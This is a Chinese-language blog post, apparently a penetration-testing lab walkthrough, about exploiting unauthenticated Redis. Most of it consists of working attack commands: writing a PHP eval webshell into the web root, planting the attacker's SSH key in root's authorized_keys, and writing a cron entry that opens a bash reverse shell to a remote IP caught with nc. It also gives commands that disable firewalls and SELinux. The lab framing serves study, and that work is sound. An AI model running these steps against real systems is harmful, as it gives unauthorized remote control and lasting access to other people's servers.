redis未授权访问--拿webshell以及实现ssh免密登录

于 2023-08-30 21:42:16 发布
阅读量632 收藏 2
点赞数
分类专栏: 渗透 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Networknovice/article/details/132591235
版权

redis未授权访问–拿webshell以及实现ssh免密登录

前言:

redis是一个非常快速的,开源的、支持网络、可基于内存亦可持久化的日志型、非关系类型的数据库;
提供多种语言的 API,java/c/c++/c#/php/javascript/

漏洞定义:
redis未授权访问漏洞是一个有域redis服务器版本较低其未设置登录密码导致的漏洞,攻击者可直接利用redis服务器
的IP地址和端口完成redis服务器的远程登录,对目标服务器完成后续的控制和利用

漏洞成因:
1.redis版本 4.x/5.0.5或以前的版本

  1. redis绑定在0.0.0.0:6379,且没有进行添加防火墙规则,避免其他飞信人来源IP访问等相关安全策略,直接暴露在公网
  2. 没有设置密码认证(一般为空),可以免密码远程登录redis服务。

漏洞危害:
攻击者 可通过redis命令向网站目录写入webshell,完成对目标网站服务器的初步控制
最严重,如果redis以root身份运行,黑客可以给root账户写入SSH公钥文件,直接通过SSH登录受害服务器

漏洞的验证及利用过程演示
实验环境准备
1.攻击机和目标机都安装好具有redis服务的linux环境
2.关闭两台实验机器的防火墙,保证后续通信可达
iptables -F
setenforce 0
systemctl stop firewalld.service
3.两台机器IP地址

靶机搭建可以参考:https://blog.csdn.net/qq_39135287/article/details/83474865

**注意:**在搭建靶机的时候redis不要设置密码,因为现在复现的是redis未授权访问。

漏洞验证
验证思路:
未授权访问漏洞的本质就是不需要用户密码就可以完成服务器的登录,所以验证思路很简单,只要能使用攻击机无密码登录目标服务器,漏洞就存在
验证过程
目标机器:/root/local/bin/redis-server /root/redis-4.0.14/redis.conf 运行redis服务器
攻击机器:redis-cli -h IP 连接redis服务器
登录之后输入info,出现内容证明验证成功

漏洞利用方法1–webshell

(目标主机必须开启web服务才可以实现此攻击)

首先攻击机用命令 redis-cli -h 目标IP -p 6379(redis服务的端口) 连接redis服务

config set dir /var/www/html 

<!--这个是设置文件存储的目标目录-->

config set dbfilename shell.php

<!--这个是设置目标文件也就是要创建的后门文件-->

set webshell "<?php  @eval($_POST['cmd']);?>"
<!--这个是将一句话木马写入刚才创建的后门文件里,webshell 就是redis中的键,类似于MySQL中的字段-->
save
注意:一定要save保存!

演示步骤:

连接redis

image-20230829214417072

执行上述步骤

用蚁剑连接成功,成功拿到webshell

漏洞利用方法2–ssh免密登录

写SSH公钥实现登录
攻击机和靶机打开 SSH服务  systemctl start ssh(没有的话用apt命令安装)
在目标机创建SSH公钥可写目录 mkdir /root/.ssh   //ls -al
清空攻击机/root/.ssh目录下的文件,方便区分一会要生成并存放进其中的SSH公钥文件:rm -rf*
在攻击机生成SSH公钥(需要连续敲击三下回车)ssh-keygen -t rsa
在攻击机上切换至公钥存放目录:cd /root/.ssh
将公钥写入1.txt(前后用\n,避免和redis里其他缓存数据混合,不用会一直失败)
(echo -e "\n\n";cat id_rsa.pub;echo -e"\n\n")>1.txt
使用redis-cli -h 目标IP 连接目标机器并执行以下命令将本地SSH公钥写入目标机
config set dir /root/.ssh ——————用来设置redis默认存储目录
config get dir  ——————查看目录设置是否成功
config set dbfilename authorized_keys ——————设置redis要写入哪个文件
save
将1.txt的文本内容带入登录目标机redis服务器的过程中,后续可以直接在目标机上设置目标文件并写入 cat 1.txt | redis-cli -h 目标IP -x set crack  ————————将1.txt中的数据写入authorized_keys这个文件
在攻击机使用ssh免密登录
cd /root/.ssh
ssh -i id_rsa root@目标IP

演示:在攻击机上生成公钥和私钥

在这里插入图片描述

将公钥写进1.txt避免与redis其他数据混淆

image-20230830163824853

连接目标机器的redis服务

image-20230830164456752

image-20230830164705861

目标机器已经被写入文件

image-20230830165525906

用攻击机成功登陆场目标机器

image-20230830165503446

漏洞利用方法3–反弹shell

利用攻击机将计划任务写进服务器
config set dir /var/spool/cron  //写入的目录  计划文件夹
config set dbfilename root     //写入的文件名
set ssr "\n* * * * * bash -i >& /dev/tcp/192.168.20.140/1234 0>&1\n"      //写入的内容
save
攻击机:执行 nc -lvvp 1234   稍等片刻   黑客机接收到目标机的shell 使用crontab -l 可查看目标机器原来写入的计划任务

演示:

image-20230830191428843

image-20230830191450162

成功反弹shell

image-20230830191517742

Xiaolisec
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
防止利用redis设置密码漏洞入侵服务器
子幽七
09-22 733
防止redis通过设置密码入侵服务器
Redis授权访问漏洞详解(全面)
m0_64481831的博客
02-26 2608
Redis是一款内存高速缓存的数据库,是一款K-V型数据库,它的所有键值都是用字典来存储的。其中它的value支持多种数据类型,包括String、List、Set、Zset和Hash。Redis默认情况下绑定在127.0.0.1:6379,在没有进行采用相关的策略,如添加防火墙规则避免其他非信任来源ip访问,就会将Redis服务暴露在公网上;并且Redis默认情况是空密码连接在服务器以root身份运行Redis时这将导致任意用户可以访问目标服务器下授权访问Redis以及读取Redis数据。
Redis webshell详解
m0_54313550的博客
04-19 457
"set 1 {}".format(shell.replace(" ","${IFS}")), //php代码空格替换成Linux系统服务器识别的空格,redis服务器也是linux系统////python insert 第一个参数0,表示从头部插入,AUTH redis命令 "AUTH{}".format 表示redis认证格式//path="/var/www/html" // url路径下面:/var/www/html ===/(根目录) -----//
用户登录(免密登录redis
weixin_45175767的博客
07-02 1238
文章目录一、功能介绍二、使用步骤1.RedisTemplate序列化类2.具体实现3.在网关设置过滤总结 一、功能介绍 (需要用到redis数据库来实现免密登录和定时登出,可以配置一个自己的redis。) 用户登录一次以后,设置指定时间再次登录不需要验证 redis可以设置数据缓存时间,数据以kv形式存取。 这里还需用到过滤器,如果token还存在,就放过,如果不存在,就过滤。 二、使用步骤 1.RedisTemplate序列化类 代码如下(示例): @Configuration public cla
Redis账号获取webshell实战
weixin_44023460的博客
12-08 729
Redis账号获取webshell实战 1.扫描某目标服务器端口信息 通过nmap对某目标服务器进行全端口扫描,发现该目标开放Redis的端口为3357,默认端口为6379端口,再次通过iis put scaner软件进行同网段服务器该端口扫描,如图1所示,获取两台开放该端口的服务器。 图1扫描同网段开放该端口的服务器 2.使用telnet登录服务器 使用命令“telnet ip port”命令...
Redis-desktop redis管理工具 支持SSH 各种系统
11-26
redis可视化工具,亲测可用,整理了一些各个系统的安装包,支持ssh远程连接
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Redis 服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。攻击者在...
redis-stack-server 7.2.0 安装包合集
最新发布
04-03
redis-stack-server-7.2.0-v9.arm64.snap redis-stack-server-7.2.0-v9.bionic.arm64.tar.gz redis-stack-server-7.2.0-v9.bionic.x86_64.tar.gz redis-stack-server-7.2.0-v9.bullseye.x86_64.tar.gz redis-stack-...
Redis授权访问配合SSH key文件利用详解
09-09
主要给大家介绍了关于Redis授权访问配合SSH key文件利用的相关资料,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
Redis稳定版 Redis-x64-5.0.14.1.zip
07-21
本次提供的版本是Redis的稳定版——Redis-x64-5.0.14.1,针对64位操作系统设计。在深入探讨Redis之前,我们先了解下Redis的基本特性。 1. **数据类型**: Redis支持五大数据类型:字符串(String)、哈希(Hash)、列表...
Redis-desktop redis管理工具 支持SSH 无bug版
12-12
Redis-desktop redis管理工具 支持SSH,SSL,Advanced sessting 无bug版
SSH2中配置Redis缓存
11-06
Redis是基于内存,也可以基于磁盘持久化nosql数据库。Redis 官网推荐给java 使用的客户端很多:Jedis、Redisson、JRedis、JDBC-Redis 等,当然首推是jedis。
利用shell脚本监控redis的使用内存
等待就是浪费青春
12-03 6751
前些天搭建的redis集群终于在生产环境使用了,为了系统的稳定,研究了下redis的监控报警。 虽然之前搭建了RedisLive,可以实时查看redis的信息,但是做不到实时的短信报警监控。 目前只针对内存进行了监控。 监控原理:周期性的去检查redis的used_memory的量,当达到报警的阀值的时候,发短信报警。 #!/bin/sh USEDMEMORY_77=$(redis-cl
(转)Web安全之如何获取一个WebShell
selecthch的博客
06-22 3739
SQL注入获取Webshell** ** 条件: 1.当前连接Mysql数据库的账户 具有FIle权限 2. 知道网站的绝对路径 利用php报错信息 Google搜索报错信息 load_file()读取配置文件信息 3. MySQL有权...
redis无密码登录
热门推荐
baiboya的专栏
07-02 1万+
redis的配置文件redis.conf中,Redis3.2加入的新特性,开启保护模式。即开启了protected-mode,默认值为protected-mode =yes是说redis只允许本机登录。这样登录的前提是要设置密码,即要requirepass属性,requirepass = 你设置的密码如要无密码登录,就要设置protected-mode =no ,即可...
redis授权访问漏洞那拿SHELL
weixin_30737363的博客
12-06 301
一、什么是redis授权访问漏洞: 1、redis是一种文档型数据库,快速高效,存储在内存中,定期才会写磁盘。主要用于快速缓存,数据转存处理等。默认redis开在6379端口,可以直接访问。并不需要任何认证信息,由此带来了巨大的安全隐患。 2、如何验证redis授权访问是否开启: 1 #使用kali或者任何linux系统安装redis-cli 2 redis-cli -h targ...
redis mysql主从分离_mysql如何设置主从(读写分离),redis发布功能,以及redis的持久化存储(rdb,aof)...
weixin_27298377的博客
01-19 155
1 mysql基本命令1.启动mysqlsystemctl start mariadb2.linux客户端连接自己mysql -uroot -p -h 127.0.0.13.远程链接mysql服务端mysql -uroot -p -h 192.168.1.197远程授权:grant all privileges on *.* to root@"192.168.1.100" identified b...
Redis Desktop Manager 利用ssh连接 Redis
weixin_30415113的博客
03-22 5123
需开启6379端口,如果不设置密码,就忽略1,2步骤 第一步: 第二步: 第三步: 第四步: 第五步: 转载于:https://www.cnblogs.com/-mrl/p/8624105.html...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8321
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
ssh怎么免密登录公钥redis
07-27
实现SSH免密登录,你需要遵循以下步骤: 1. 生成SSH密钥对:使用SSH密钥对可以实现安全的身份验证。打开终端并输入以下命令生成密钥对: ``` ssh-keygen -t rsa ``` 2. 按需求选择密钥保存位置和设置密码。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值